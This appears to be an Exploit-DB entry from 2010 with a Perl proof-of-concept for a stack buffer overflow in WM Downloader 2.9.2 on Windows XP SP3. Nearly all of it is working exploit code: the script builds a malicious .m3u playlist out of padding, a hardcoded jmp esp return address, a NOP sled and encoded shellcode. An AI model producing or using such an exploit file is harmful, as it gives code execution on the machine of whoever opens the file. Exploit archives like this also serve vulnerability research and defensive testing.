WM Downloader 2.9.2 - Stack Buffer Overflow

2010-06-25T00:00:00
ID EDB-ID:14044
Type exploitdb
Reporter Madjix
Modified 2010-06-25T00:00:00

Description

WM Downloader 2.9.2 Stack Buffer Overflow. Local exploit for windows platform

                    
                      #!/usr/bin/perl
#WM Downloader 2.9.2 stack buffer overflow
#win sp3
#By Madjix Dz8[at]hotmail[dot]com
my $hd = "#EXTM3U\n";
my $jnk="http://"."\x41" x 257 ;
my $eip = "\x7B\x46\x86\x7C" ; # 0x7C86467B jmp esp kernel 32
my $shellcode = "\x90" x 25;
$shellcode = $shellcode
."\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
my $jnk2= "\x41" x 50000 ;
open(MYFILE,'>>MadjiX.m3u');

print MYFILE $hd.$jnk.$eip.$preshellcode.$shellcode.$jnk2;

close(MYFILE);